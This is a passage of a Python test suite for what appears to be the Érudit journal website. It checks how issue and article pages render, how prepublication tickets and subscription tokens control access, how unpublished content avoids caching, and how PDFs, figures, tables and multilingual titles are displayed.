assert "thisismyoldtitle" in resp.content.decode('utf-8')
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_title('thisismynewtitle')
resp = Client().get(url, {'ticket': issue.prepublication_ticket})
assert "thisismyoldtitle" in resp.content.decode('utf-8')
def test_can_return_404_when_issue_doesnt_exist(self):
issue = IssueFactory(
localidentifier='test',
)
issue.localidentifier = 'fail'
url = issue_detail_url(issue)
response = Client().get(url)
assert response.status_code == 404
@pytest.mark.parametrize('publication_allowed', (True, False))
def test_publication_allowed_article(self, publication_allowed):
issue = IssueFactory(journal__open_access=True)
article = ArticleFactory(issue=issue, publication_allowed=publication_allowed)
url = reverse('public:journal:issue_detail', kwargs={
'journal_code': issue.journal.code,
'issue_slug': issue.volume_slug,
'localidentifier': issue.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
toolbox = dom.find('ul', {'class': 'toolbox'})
summary_link = dom.find('p', {'class': 'bib-record__record-link'})
if publication_allowed:
assert toolbox
assert summary_link
else:
assert not toolbox
assert not summary_link
@override_settings(CACHES=settings.LOCMEM_CACHES)
@pytest.mark.parametrize('language_code, expected_link', (
('fr', '<a class="tool-btn" href="/fr/revues/journal/2000-issue/article.pdf" '
'target="_blank" title="Télécharger">'),
('en', '<a class="tool-btn" href="/en/journals/journal/2000-issue/article.pdf" '
'target="_blank" title="Download">'),
))
def test_article_pdf_url_is_cached_with_the_right_language(
self, language_code, expected_link,
):
article = ArticleFactory(
issue__journal__code='journal',
issue__year='2000',
issue__localidentifier='issue',
localidentifier='article',
with_pdf=True,
)
with override_settings(LANGUAGE_CODE=language_code):
url = reverse('public:journal:issue_detail', kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'localidentifier': article.issue.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
toolbox = dom.find('ul', {'class': 'toolbox'})
assert expected_link in toolbox.decode()
def test_journal_titles_and_subtitles_are_displayed_in_all_languages(self):
issue = IssueFactory(journal__code='journal')
repository.api.set_publication_xml(
issue.get_full_identifier(),
open('tests/fixtures/issue/im03868.xml', 'rb').read(),
)
url = reverse('public:journal:issue_detail', kwargs={
'journal_code': issue.journal.code,
'issue_slug': issue.volume_slug,
'localidentifier': issue.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
title1 = dom.find('p', {'class': 'main-header__meta'}).decode()
assert title1 == '<p class="main-header__meta">\n' \
'<a href="/fr/revues/journal/" title="Consulter la revue">\n ' \
'Intermédialités\n \n \n ' \
'<span class="hint--bottom-left hint--no-animate" ' \
'data-hint="Tous les articles de cette revue sont soumis à un processus ' \
'd’évaluation par les pairs.">\n' \
'<i class="icon ion-ios-checkmark-circle"></i>\n' \
'</span>\n<br/>\n' \
'<span class="journal-subtitle">Histoire et théorie des arts, ' \
'des lettres et des techniques</span>\n<br/>\n ' \
'Intermediality\n \n \n <br/>\n' \
'<span class="journal-subtitle">History and Theory of the Arts, ' \
'Literature and Technologies</span>\n</a>\n</p>'
title2 = dom.find('div', {'class': 'latest-issue'}).find('h2').decode()
assert title2 == '<h2>\n<a href="/fr/revues/journal/" title="Consulter la revue">\n ' \
'Intermédialités\n \n <br/>\n' \
'<span class="journal-subtitle">Histoire et théorie des arts, ' \
'des lettres et des techniques</span>\n<br/>\n ' \
'Intermediality\n \n \n <br/>\n' \
'<span class="journal-subtitle">History and Theory of the Arts, ' \
'Literature and Technologies</span>\n</a>\n</h2>'
class TestArticleDetailView:
@pytest.fixture(autouse=True)
def article_detail_solr_data(self, monkeypatch):
monkeypatch.setattr(SolrDataMixin, 'solr_data', FakeSolrData())
@pytest.mark.parametrize('method', [
'get', 'options'
])
def test_can_render_erudit_articles(self, monkeypatch, eruditarticle, method):
# The goal of this test is to verify that our erudit article mechanism doesn't crash for
# all kinds of articles. We have many articles in our fixtures and the `eruditarticle`
# argument here is a parametrization argument which causes this test to run for each
# fixture we have.
monkeypatch.setattr(metrics_settings, 'ACTIVATED', False)
monkeypatch.setattr(Article, 'get_erudit_object', lambda *a, **kw: eruditarticle)
journal = JournalFactory.create(open_access=True)
issue = IssueFactory.create(
journal=journal, date_published=dt.datetime.now(), localidentifier='test_issue')
article = ArticleFactory.create(issue=issue, localidentifier='test_article')
url = article_detail_url(article)
response = getattr(Client(), method)(url)
assert response.status_code == 200
@pytest.mark.parametrize("is_published,has_ticket,expected_code", [
(True, False, 200),
(True, True, 200),
(False, False, 302),
(False, True, 200),
])
def test_can_accept_prepublication_ticket(self, is_published, has_ticket, expected_code):
localidentifier = "espace03368"
issue = IssueFactory(localidentifier=localidentifier, is_published=is_published)
article = ArticleFactory(issue=issue)
url = article_detail_url(article)
data = None
if has_ticket:
ticket = md5(localidentifier.encode()).hexdigest()
data = {'ticket': ticket}
response = Client().get(url, data=data)
assert response.status_code == expected_code
@pytest.mark.parametrize("is_published,ticket_expected", [
(True, False),
(False, True),
])
def test_prepublication_ticket_is_propagated_to_other_pages(self, is_published, ticket_expected):
localidentifier = "espace03368"
issue = IssueFactory(localidentifier=localidentifier, is_published=is_published)
articles = ArticleFactory.create_batch(issue=issue, size=3)
article = articles[1]
url = article_detail_url(article)
ticket = md5(localidentifier.encode()).hexdigest()
response = Client().get(url, data={'ticket': ticket})
from io import StringIO
tree = et.parse(StringIO(response.content.decode()), et.HTMLParser())
# Test that the ticket is in the breadcrumbs
bc_hrefs = [e.get('href') for e in tree.findall('.//nav[@id="breadcrumbs"]//a')]
pa_hrefs = [e.get('href') for e in tree.findall('.//div[@class="pagination-arrows"]/a')]
# This is easier to debug than a generator
for href in bc_hrefs + pa_hrefs:
assert ('ticket' in href) == ticket_expected
def test_dont_cache_html_of_articles_of_unpublished_issues(self):
issue = IssueFactory.create(is_published=False)
article = ArticleFactory.create(issue=issue, title='thiswillendupinhtml')
url = '{}?ticket={}'.format(article_detail_url(article), issue.prepublication_ticket)
response = Client().get(url)
assert response.status_code == 200
assert b'thiswillendupinhtml' in response.content
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_title('thiswillreplaceoldinhtml')
response = Client().get(url)
assert response.status_code == 200
assert b'thiswillendupinhtml' not in response.content
assert b'thiswillreplaceoldinhtml' in response.content
def test_dont_cache_fedora_objects_of_articles_of_unpublished_issues(self):
with unittest.mock.patch('erudit.fedora.modelmixins.cache') as cache_mock:
cache_mock.get.return_value = None
issue = IssueFactory.create(is_published=False)
article = ArticleFactory.create(issue=issue)
url = '{}?ticket={}'.format(article_detail_url(article), issue.prepublication_ticket)
response = Client().get(url)
assert response.status_code == 200
# Assert that the cache has not been called.
assert cache_mock.get.call_count == 0
def test_allow_ephemeral_articles(self):
# When receiving a request for an article that doesn't exist in the DB, try querying fedora
# for the requested PID before declaring a failure.
issue = IssueFactory.create()
article_localidentifier = 'foo'
repository.api.register_article(
'{}.{}'.format(issue.get_full_identifier(), article_localidentifier)
)
url = reverse('public:journal:article_detail', kwargs={
'journal_code': issue.journal.code, 'issue_slug': issue.volume_slug,
'issue_localid': issue.localidentifier, 'localid': article_localidentifier})
response = Client().get(url)
assert response.status_code == 200
@unittest.mock.patch('pikepdf.open')
@unittest.mock.patch('eulfedora.models.FileDatastreamObject._get_content')
@pytest.mark.parametrize('content_access_granted,has_abstracts,should_fetch_pdf', (
(True, True, False),
(True, False, False),
(False, True, False),
(False, False, True)
))
def test_do_not_fetch_pdfs_if_not_necessary(
self, mock_pikepdf, mock_content, content_access_granted, has_abstracts, should_fetch_pdf
):
""" Test that the PDF is only fetched on ArticleDetailView when the user is not
subscribed and the article has no abstracts.
"""
article = ArticleFactory(with_pdf=True)
client = Client()
if has_abstracts:
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_abstracts([{'lang': 'fr', 'content': 'Résumé français'}])
if content_access_granted:
subscription = JournalAccessSubscriptionFactory(
pk=1,
user__password='password',
post__valid=True,
post__journals=[article.issue.journal],
organisation=None, # TODO implement IndividualJournalAccessSubscriptionFactory
)
client.login(username=subscription.user.username, password="password")
url = article_detail_url(article)
response = client.get(url)
if should_fetch_pdf:
assert mock_content.call_count == 1
else:
assert mock_content.call_count == 0
assert response.status_code == 200
def test_querystring_doesnt_mess_media_urls(self):
journal = JournalFactory(open_access=True) # so we see the whole article
issue = IssueFactory(journal=journal)
article = ArticleFactory(issue=issue, from_fixture='1003446ar') # this article has media
url = '{}?foo=bar'.format(article_detail_url(article))
response = Client().get(url)
# we have some media urls
assert b'media/' in response.content
# We don't have any messed up media urls, that is, an URL with our querystring in the
# middle
assert b'barmedia/' not in response.content
@unittest.mock.patch('erudit.fedora.cache.cache')
@unittest.mock.patch('erudit.fedora.cache.get_datastream_file_cache')
@unittest.mock.patch('erudit.fedora.cache.get_cached_datastream_content')
@pytest.mark.parametrize('is_published, expected_count', [
# When an issue is not published, we should not get any cache.get() calls when displaying
# an article's PDF.
(False, 0),
# When an issue is published, we should get one cache.get() call when displaying an
# article's PDF.
(True, 1),
])
def test_pdf_datastream_caching(self, mock_cache, mock_get_datastream_file_cache,
mock_get_cached_datastream_content, is_published,
expected_count):
mock_cache.get.return_value = None
mock_get_datastream_file_cache.return_value = mock_cache
mock_get_cached_datastream_content.return_value = None
article = ArticleFactory(
issue__is_published=is_published,
issue__journal__open_access=True,
)
url = reverse('public:journal:article_raw_pdf', kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
mock_cache.get.reset_mock()
Client().get(url, {
'ticket': article.issue.prepublication_ticket,
})
assert mock_cache.get.call_count == expected_count
@unittest.mock.patch('erudit.fedora.modelmixins.cache')
@pytest.mark.parametrize('is_published, expected_count', [
# When an issue is not published, we should not get any cache.get() calls when displaying
# an article's XML.
(False, 0),
# When an issue is published, we should get one cache.get() call when displaying an
# article's XML.
(True, 1),
])
def test_xml_datastream_caching(self, mock_cache, is_published, expected_count):
mock_cache.get.return_value = None
article = ArticleFactory(
issue__is_published=is_published,
issue__journal__open_access=True,
)
url = reverse('public:journal:article_raw_xml', kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
mock_cache.get.reset_mock()
Client().get(url, {
'ticket': article.issue.prepublication_ticket,
})
assert mock_cache.get.call_count == expected_count
def test_that_article_titles_are_truncated_in_breadcrumb(self):
article = ArticleFactory(
from_fixture='1056823ar',
localidentifier='article',
issue__localidentifier='issue',
issue__year='2000',
issue__journal__code='journal',
)
url = article_detail_url(article)
response = Client().get(url)
html = response.content.decode()
assert '<a href="/fr/revues/journal/2000-issue/article/">Jean-Guy Desjardins, Traité de ' \
'l’évaluation foncière, Montréal, Wilson & Lafleur …</a>' in html
def test_keywords_html_tags(self):
article = ArticleFactory(from_fixture='1055883ar')
url = article_detail_url(article)
response = Client().get(url)
html = response.content.decode()
# Check that HTML tags are displayed in the body.
assert '<ul>\n<li class="keyword">Charles Baudelaire, </li>\n<li class="keyword">\n' \
'<em>Fleurs du Mal</em>, </li>\n<li class="keyword">Seine, </li>\n' \
'<li class="keyword">mythe et réalité de Paris, </li>\n' \
'<li class="keyword">poétique du miroir</li>\n</ul>' in html
# Check that HTML tags are not displayed in the head.
assert '<meta name="citation_keywords" lang="fr" content="Charles Baudelaire, Fleurs du ' \
'Mal, Seine, mythe et réalité de Paris, poétique du miroir" />' in html
def test_article_pdf_links(self):
article = ArticleFactory(
with_pdf=True,
from_fixture='602354ar',
localidentifier='602354ar',
issue__year='2000',
issue__localidentifier='issue',
issue__is_published=False,
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
response = Client().get(url, {
'ticket': article.issue.prepublication_ticket if not article.issue.is_published else '',
})
html = response.content.decode()
# Check that the PDF download button URL has the prepublication ticket if the issue is not
# published.
assert '<a class="tool-btn tool-download" ' \
'data-href="/fr/revues/journal/2000-issue/602354ar.pdf?' \
'ticket=0aae4c8f3cc35693d0cbbe631f2e8b52"><span class="toolbox-pdf">PDF</span>' \
'<span class="tools-label">Télécharger</span></a>' in html
# Check that the PDF menu link URL has the prepublication ticket if the issue is not
# published.
assert '<a href="#pdf-viewer" id="pdf-viewer-menu-link">Texte intégral (PDF)</a>' \
'<a href="/fr/revues/journal/2000-issue/602354ar.pdf?' \
'ticket=0aae4c8f3cc35693d0cbbe631f2e8b52" id="pdf-download-menu-link" ' \
'target="_blank">Texte intégral (PDF)</a>' in html
# Check that the embedded PDF URL has the prepublication ticket if the issue is not
# published.
assert '<object id="pdf-viewer" data="/fr/revues/journal/2000-issue/602354ar.pdf?' \
'embed&ticket=0aae4c8f3cc35693d0cbbe631f2e8b52" type="application/pdf" ' \
'style="width: 100%; height: 700px;"></object>' in html
# Check that the PDF download link URL has the prepublication ticket if the issue is not
# published.
assert '<a href="/fr/revues/journal/2000-issue/602354ar.pdf?' \
'ticket=0aae4c8f3cc35693d0cbbe631f2e8b52" class="btn btn-secondary" ' \
'target="_blank">Télécharger</a>' in html
article.issue.is_published = True
article.issue.save()
response = Client().get(url)
html = response.content.decode()
# Check that the PDF download button URL does not have the prepublication ticket if the
# issue is published.
assert '<a class="tool-btn tool-download" data-href="/fr/revues/journal/2000-issue/' \
'602354ar.pdf"><span class="toolbox-pdf">PDF</span><span ' \
'class="tools-label">Télécharger</span></a>' in html
# Check that the PDF menu link URL does not have the prepublication ticket if the issue
# is published.
assert '<a href="#pdf-viewer" id="pdf-viewer-menu-link">Texte intégral (PDF)</a>' \
'<a href="/fr/revues/journal/2000-issue/602354ar.pdf" id="pdf-download-menu-link" ' \
'target="_blank">Texte intégral (PDF)</a>' in html
# Check that the embedded PDF URL does not have the prepublication ticket if the issue is
# published.
assert '<object id="pdf-viewer" data="/fr/revues/journal/2000-issue/602354ar.pdf?' \
'embed" type="application/pdf" style="width: 100%; height: 700px;"></object>' in html
# Check that the PDF download link URL does not have the prepublication ticket if the issue
# is published.
assert '<a href="/fr/revues/journal/2000-issue/602354ar.pdf" class="btn btn-secondary" ' \
'target="_blank">Télécharger</a>' in html
@pytest.mark.parametrize('kwargs, nonce_count, authorized', (
# Valid token
({}, 1, True),
# Badly formed token
({'token_separator': '!'}, 1, False),
# Invalid nonce
({'invalid_nonce': True}, 1, False),
# Invalid message
({'invalid_message': True}, 1, False),
# Invalid signature
({'invalid_signature': True}, 1, False),
# Nonce seen more than 3 times
({}, 4, False),
# Badly formatted payload
({'payload_separator': '!'}, 1, False),
# Expired token
({'time_delta': 3600000001}, 1, False),
# Wrong IP
({'ip_subnet': '8.8.8.0/24'}, 1, False),
# Invalid subscription
({'subscription_id': 2}, 1, False),
))
@pytest.mark.parametrize('url_name', (
('public:journal:article_detail'),
('public:journal:article_raw_pdf'),
))
@unittest.mock.patch('core.subscription.middleware.SubscriptionMiddleware._nonce_count')
@override_settings(GOOGLE_CASA_KEY='74796E8FF6363EFF91A9308D1D05335E')
def test_article_detail_with_google_casa_token(self, mock_nonce_count, url_name, kwargs,
nonce_count, authorized):
mock_nonce_count.return_value = nonce_count
article = ArticleFactory()
JournalAccessSubscriptionFactory(
pk=1,
post__valid=True,
post__journals=[article.issue.journal],
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
response = Client().get(url, {
'casa_token': generate_casa_token(**kwargs),
}, follow=True)
html = response.content.decode()
if authorized:
assert 'Seuls les 600 premiers mots du texte seront affichés.' not in html
else:
assert 'Seuls les 600 premiers mots du texte seront affichés.' in html
@pytest.mark.parametrize('url_name, fixture, display_biblio, display_pdf_first_page', (
# Complete treatment articles should always display a bibliography
('public:journal:article_biblio', '009256ar', 1, 0),
('public:journal:article_summary', '009256ar', 1, 0),
('public:journal:article_detail', '009256ar', 1, 0),
# Retro minimal treatment articles should only display a bibliography in article_biblio view
('public:journal:article_biblio', '1058447ar', 1, 0),
('public:journal:article_summary', '1058447ar', 0, 1),
('public:journal:article_detail', '1058447ar', 0, 1),
# Bibliography should not be displayed on TOC page.
('public:journal:article_toc', '009256ar', 0, 0),
('public:journal:article_toc', '1058447ar', 0, 0),
))
def test_biblio_references_display(self, url_name, fixture, display_biblio,
display_pdf_first_page):
article = ArticleFactory(
from_fixture=fixture,
with_pdf=True,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
assert html.count('<section id="grbiblio" class="article-section grbiblio" '
'role="complementary">') == display_biblio
# Minimal treatment articles should not display PDF first page when displaying references.
assert html.count('<object id="pdf-viewer"') == display_pdf_first_page
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
('public:journal:article_biblio'),
('public:journal:article_summary'),
('public:journal:article_detail'),
('public:journal:article_toc'),
))
def test_display_citation_fulltext_world_readable_metatag_only_for_open_access_articles(
self, url_name, open_access
):
article = ArticleFactory(issue__journal__open_access=open_access)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
# The citation_fulltext_world_readable metatag should only be displayed for open access
# articles. Otherwise, some Google Scholar services won't work (eg. CASA).
if open_access:
assert '<meta name="citation_fulltext_world_readable" content="" />' in html
else:
assert '<meta name="citation_fulltext_world_readable" content="" />' not in html
@pytest.mark.parametrize('publication_allowed', (True, False))
@pytest.mark.parametrize('url_name', (
('public:journal:article_biblio'),
('public:journal:article_summary'),
('public:journal:article_detail'),
('public:journal:article_toc'),
))
def test_publication_allowed_text_display(self, url_name, publication_allowed):
article = ArticleFactory(
publication_allowed=publication_allowed,
issue__journal__open_access=True,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
if publication_allowed:
assert 'Plan de l’article' in dom.decode()
assert 'Boîte à outils' in dom.decode()
if url_name != 'public:journal:article_detail':
assert 'Lire le texte intégral' in dom.decode()
if url_name not in ['public:journal:article_biblio', 'public:journal:article_toc']:
assert 'In October 1800 the poet, travel-writer and polemicist Robert Southey ' \
'was in Portugal.' in dom.decode()
else:
assert 'Plan de l’article' not in dom.decode()
assert 'Boîte à outils' not in dom.decode()
assert 'Lire le texte intégral' not in dom.decode()
assert 'In October 1800 the poet, travel-writer and polemicist Robert Southey was in ' \
'Portugal.' not in dom.decode()
def test_article_detail_marquage_in_toc_nav(self):
issue = IssueFactory(
journal__code='journal',
localidentifier='issue',
year='2000',
)
ArticleFactory(
from_fixture='1054008ar',
localidentifier='prev_article',
issue=issue,
)
article = ArticleFactory(
issue=issue,
)
ArticleFactory(
from_fixture='1054008ar',
localidentifier='next_article',
issue=issue,
)
url = article_detail_url(article)
response = Client().get(url)
html = response.content.decode()
# Check that TOC navigation titles include converted marquage.
assert '<a href="/fr/revues/journal/2000-issue/prev_article/" class="toc-nav__prev" ' \
'title="Article précédent"><span class="toc-nav__arrow">' \
'<span class="arrow arrow-bar is-left"></span></span>' \
'<h4 class="toc-nav__title">\n L’action et le verbe dans ' \
'<em>Feuillets d’Hypnos</em>\n</h4></a>' in html
assert '<a href="/fr/revues/journal/2000-issue/next_article/" class="toc-nav__next" ' \
'title="Article suivant"><span class="toc-nav__arrow">' \
'<span class="arrow arrow-bar is-right"></span></span><h4 ' \
'class="toc-nav__title">\n L’action et le verbe dans ' \
'<em>Feuillets d’Hypnos</em>\n</h4></a>' in html
def test_surtitre_not_split_in_multiple_spans(self):
article = ArticleFactory(
from_fixture='1056389ar',
)
url = article_detail_url(article)
response = Client().get(url)
html = response.content.decode()
assert '<span class="surtitre">Cahier commémoratif : ' \
'25<sup>e</sup> anniversaire</span>' in html
def test_title_and_paral_title_are_displayed(self):
article = ArticleFactory(
from_fixture='1058368ar',
)
url = article_detail_url(article)
response = Client().get(url)
html = response.content.decode()
assert '<span class="titre">Les Parcs Nationaux de Roumanie : considérations sur les ' \
'habitats Natura 2000 et sur les réserves IUCN</span>' in html
assert '<span class="titreparal">The National Parks of Romania: considerations on Natura ' \
'2000 habitats and IUCN reserves</span>' in html
def test_article_detail_view_with_untitled_article(self):
article = ArticleFactory(
from_fixture='1042058ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__name='Revue',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that "[Article sans titre]" is displayed in the header title.
assert '<title>[Article sans titre] – Inter – Érudit</title>' in html
# Check that "[Article sans titre]" is displayed in the body title.
assert '<h1 class="doc-head__title"><span class="titre">[Article sans titre]</span></h1>' in html
# Check that "[Article sans titre]" is displayed in the breadcrumbs.
assert '<li>\n <a href="/fr/revues/journal/2000-issue/article/">[Article sans titre]</a>' \
'\n</li>' in html
def test_article_authors_with_suffixes(self):
article = ArticleFactory(
from_fixture='1058611ar',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that authors' suffixes are not displayed in the author list under the article
# title.
assert '<li class="auteur doc-head__author">\n<span class="nompers">André\n ' \
'Ngamini-Ngui</span> et </li>' in html
# Check that authors' suffixes are displayed in the 'more information' section.
assert '<li class="auteur-affiliation"><p><strong>André\n Ngamini-Ngui, †</strong>' \
'</p></li>' in html
def test_figure_groups_source_display(self):
article = ArticleFactory(
from_fixture='1058470ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
grfigure = dom.find('div', {'class': 'grfigure', 'id': 'gf1'})
# Check that the source is displayed under both figures 1 & 2, which are in the same figure group.
fi1 = grfigure.find('figure', {'id': 'fi1'}).decode()
fi2 = grfigure.find('figure', {'id': 'fi2'}).decode()
assert fi1 == '<figure class="figure" id="fi1"><figcaption></figcaption><div ' \
'class="figure-wrapper">\n<div class="figure-object"><a class="lightbox ' \
'objetmedia" href="/fr/revues/journal/2000-issue/article/media/" title="">' \
'<img alt="" class="lazyload img-responsive" data-aspectratio="/" ' \
'data-srcset="/fr/revues/journal/2000-issue/article/media/ w" height="" ' \
'src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAA' \
'AC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" width=""/></a></div>\n' \
'<div class="figure-legende-notes-source"><cite class="source">Avec ' \
'l’aimable autorisation de l’artiste et kamel mennour, Paris/London. © ' \
'<em>ADAGP Mohamed Bourouissa</em></cite></div>\n</div></figure>'
assert fi2 == '<figure class="figure" id="fi2"><figcaption></figcaption><div ' \
'class="figure-wrapper">\n<div class="figure-object"><a class="lightbox ' \
'objetmedia" href="/fr/revues/journal/2000-issue/article/media/" title="">' \
'<img alt="" class="lazyload img-responsive" data-aspectratio="/" ' \
'data-srcset="/fr/revues/journal/2000-issue/article/media/ w" height="" ' \
'src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAA' \
'AC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" width=""/></a></div>\n' \
'<div class="figure-legende-notes-source"><cite class="source">Avec ' \
'l’aimable autorisation de l’artiste et kamel mennour, Paris/London. © ' \
'<em>ADAGP Mohamed Bourouissa</em></cite></div>\n</div></figure>'
# Check that the figure list link is displayed.
voirliste = grfigure.find('p', {'class': 'voirliste'})
assert voirliste.decode() == '<p class="voirliste"><a href="#ligf1">-> Voir la liste ' \
'des figures</a></p>'
@unittest.mock.patch.object(ArticleDigitalObject, 'infoimg')
def test_figure_with_float_dimensions(self, mock_infoimg):
article = ArticleFactory(
from_fixture='1068859ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
mock_infoimg.content = unittest.mock.MagicMock()
mock_infoimg.content.serialize = unittest.mock.MagicMock(
return_value="""
<infoDoc>
<im id="img-05-01.png">
<imPlGr>
<nomImg>2135184.png</nomImg>
<dimx>863.0</dimx>
<dimy>504.0</dimy>
<taille>246ko</taille>
</imPlGr>
</im>
</infoDoc>
"""
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
fi1 = dom.find('figure', {'id': 'fi1'}).find('img').decode()
assert '<img alt="Modèle intégrateur : les mécanismes du façonnement des normes par la ' \
'sphère médiatique" class="lazyload img-responsive" data-aspectratio="863/504" ' \
'data-srcset="/fr/revues/journal/2000-issue/article/media/2135184.png 863w" ' \
'height="504" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1H' \
'AwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" width="863"/>' == fi1
def test_table_groups_display(self):
article = ArticleFactory(
from_fixture='1061713ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
grtableau = dom.find_all('div', {'class': 'grtableau'})[0]
figures = grtableau.find_all('figure')
# Check that the table group is displayed.
assert grtableau.attrs.get('id') == 'gt1'
# Check that the tables are displayed inside the table group.
assert figures[0].attrs.get('id') == 'ta2'
assert figures[1].attrs.get('id') == 'ta3'
assert figures[2].attrs.get('id') == 'ta4'
# Check that the table images are displayed inside the tables.
assert len(figures[0].find_all('img', {'class': 'img-responsive'})) == 1
assert len(figures[1].find_all('img', {'class': 'img-responsive'})) == 1
assert len(figures[2].find_all('img', {'class': 'img-responsive'})) == 1
# Check that the table legends are displayed inside the tables.
assert len(figures[0].find_all('p', {'class': 'alinea'})) == 1
assert len(figures[1].find_all('p', {'class': 'alinea'})) == 2
assert len(figures[2].find_all('p', {'class': 'alinea'})) == 4
def test_table_groups_display_with_table_no(self):
article = ArticleFactory(
from_fixture='1060065ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
grtableau = dom.find_all('div', {'class': 'grtableau'})[0]
figures = grtableau.find_all('figure')
# Check that the table group is displayed.
assert grtableau.attrs.get('id') == 'gt1'
# Check that the tables are displayed inside the table group.
assert figures[0].attrs.get('id') == 'ta2'
assert figures[1].attrs.get('id') == 'ta3'
# Check that the table numbers are displayed.
assert figures[0].find_all('p', {'class': 'no'})[0].text == '2A'
assert figures[1].find_all('p', {'class': 'no'})[0].text == '2B'
def test_figure_back_arrow_is_displayed_when_theres_no_number_or_title(self):
article = ArticleFactory(
from_fixture='1031003ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that the arrow to go back to the figure is present even if there's no figure
# number or caption.
assert '<figure class="tableau" id="lita7"><figcaption><p class="allertexte">' \
'<a href="#ta7"><span class="arrow arrow-bar is-top"></span></a></p>' \
'</figcaption>' in html
def test_figure_groups_numbers_display_in_figure_list(self):
article = ArticleFactory(
from_fixture='1058470ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that the figure numbers are displayed in the figure list for figure groups.
assert '<div class="grfigure" id="ligf1">\n<div class="grfigure-caption">\n' \
'<p class="allertexte"><a href="#gf1"><span class="arrow arrow-bar is-top"></span>' \
'</a></p>\n<p class="no">Figures 1 - 2</p>' in html
def test_figcaption_display_for_figure_groups_and_figures(self):
article = ArticleFactory(
from_fixture='1060169ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that figure group caption and the figure captions are displayed.
assert '<div class="grfigure-caption">\n<p class="allertexte"><a href="#gf1">' \
'<span class="arrow arrow-bar is-top"></span></a></p>\n' \
'<p class="no">Figure 1</p>\n<div class="legende"><p class="legende">' \
'<strong class="titre">RMF frequencies in German data</strong>' \
'</p></div>\n</div>' in html
assert '<figcaption><p class="legende"><strong class="titre">German non-mediated</strong>' \
'</p></figcaption>' in html
assert '<figcaption><p class="legende"><strong class="titre">German interpreted' \
'</strong></p></figcaption>' in html
def test_article_multilingual_titles(self):
article = ArticleFactory(
from_fixture='1059303ar',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that paral titles are displayed in the article header.
assert '<span class="titreparal">Détection d’ADN d’<em>Ophiostoma ulmi</em> ' \
'introgressé naturellement dans les régions entourant les loci contrôlant ' \
'la pathogénie et le type sexuel chez <em>O. novo-ulmi</em></span>' in html
# Check that paral titles are not displayed in summary section.
assert '<h4><span class="title">Détection d’ADN d’<em>Ophiostoma ulmi</em> introgressé ' \
'naturellement dans les régions entourant les loci contrôlant la pathogénie et le ' \
'type sexuel chez <em>O. novo-ulmi</em></span></h4>' not in html
def test_authors_more_information_for_author_with_suffix_and_no_affiliation(self):
article = ArticleFactory(
from_fixture='1059571ar',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that the 'more information' accordion is displayed for an author with a suffix
# and no affiliation.
assert '<ul class="akkordion-content unstyled"><li class="auteur-affiliation"><p>' \
'<strong>Guy\n Sylvestre, o.c.</strong></p></li></ul>' in html
def test_journal_multilingual_titles_in_citations(self):
issue = IssueFactory(year="2019")
repository.api.set_publication_xml(
issue.get_full_identifier(),
